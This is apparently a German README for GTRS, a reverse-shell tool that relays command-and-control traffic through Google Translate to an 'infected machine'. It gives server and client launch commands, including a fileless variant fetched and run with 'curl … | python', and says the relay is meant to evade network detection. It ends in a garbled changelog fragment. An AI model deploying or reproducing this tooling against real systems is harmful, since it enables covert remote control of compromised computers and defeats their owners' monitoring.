
GTRS - Google Übersetzer Reverse Shell
Dieses Tool verwendet Google Translator als Proxy, um beliebige Befehle an einen infizierten Rechner zu senden.
[INFIZIERTER RECHNER] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
Zuerst benötigst du einen VPS und eine Domain. Für die Domain kannst du eine kostenlose auf Freenom erhalten.
Starte server.py auf deinem VPS
python2.7 server.py
Server läuft auf Port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
Es wird ein geheimer Schlüssel ausgegeben, der auf dem Client verwendet wird.
Führe den Client auf einem Computer mit Zugriff auf Google Translator aus. Gib die Domain und den vom Server generierten geheimen Schlüssel an.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Jetzt hast du eine interaktive Shell mit Named-Pipe-Dateien. Ja, du kannst mit cd in Verzeichnisse wechseln.
Du musst zuerst die Binärdatei herunterladen oder sie kompilieren. Danach ist der Vorgang gleich wie beim Bash-Client.
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Mit diesem Client hast du die Möglichkeit, ihn unter Linux, Mac und Windows auszuführen. Der Client hat jedoch noch keine interaktive Shell.
Nachdem ich diesen Blogpost gelesen hatte, habe ich eine einfache Anpassung vorgenommen, um GTRS im Arbeitsspeicher auszuführen. Bearbeite einfach den Host und den Schlüssel im Skript inmemory-linux.py, hoste es dann auf einem Server und rufe es per curl ab.
curl https://yourserver.ml/inmemory-linux.py | python
Oder du kannst das Skript mit dem YouTube-Ansatz hosten.
CODE IST BILLIG ZEIG MIR DIE DEMO
.bashrc lesen können.Problem behoben durch Verwendung des User-Agent-Headers zum Senden von Daten.xmllint installieren, das in libxml2-utils enthalten ist.Problem behoben: Der Client ist jetzt auch in Go geschrieben.